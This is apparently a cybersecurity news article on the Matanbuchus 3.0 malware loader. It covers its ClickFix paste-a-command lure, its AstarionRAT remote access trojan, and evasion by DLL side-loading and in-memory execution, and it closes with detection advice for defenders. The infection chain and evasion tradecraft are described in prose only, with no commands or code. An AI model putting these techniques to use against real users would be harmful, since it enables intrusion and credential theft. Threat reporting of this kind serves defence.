Matanbuchus 3.0 has reentered the cybersecurity landscape in February 2026 after a lengthy absence. This latest version, fully rewritten, now commands a steep subscription fee of $15,000 monthly, indicating a shift towards high-value, targeted operations rather than broad spam campaigns.
ClickFix Social Engineering
The malware employs the ‘ClickFix’ social engineering tactic, misleading users into executing harmful commands by presenting them as solutions to fictitious browser errors or software updates. This approach circumvents traditional security measures by exploiting trust rather than software vulnerabilities.
Victims receive deceptive prompts urging them to copy and paste specific commands into PowerShell or Run dialogs. The URLs used confuse logging systems with backslashes and path traversal sequences. As the user initiates the process, many standard defenses are bypassed, leading to a silent installation without any visible interface.
AstarionRAT Delivery
Security analysts at Huntress have identified that Matanbuchus 3.0’s campaign delivers a novel payload known as AstarionRAT post-infection. This remote access trojan boasts 24 commands, including credential theft and SOCKS5 proxying, allowing operators to quickly move laterally within networks to target domain controllers, often with the intent of deploying ransomware or stealing data.
The infection mechanism is sophisticated, beginning with a mixed-case msiexec command fetching a payload from a newly registered domain. A legitimate yet vulnerable antivirus binary is then deployed alongside a malicious DLL in directories mimicking reputable vendors, further complicating detection.
Evading Detection
To obscure its actions, the malware uses a renamed version of 7-Zip to extract password-protected archives containing subsequent components. The malicious DLL, side-loaded by the antivirus engine, decrypts the Matanbuchus loader, launching an embedded Lua interpreter that executes the final AstarionRAT payload directly into memory, minimizing forensic traces.
Security teams are advised to configure endpoint detection systems to flag msiexec commands with mixed-case characters or suspect URLs. Monitoring for unusual directories in %APPDATA% and verifying connections to recently registered domains is crucial. Employee training to avoid pasting raw commands into terminals is also essential.
For more updates on cybersecurity threats and defenses, follow us on Google News, LinkedIn, and X, and set CSN as a preferred news source on Google.
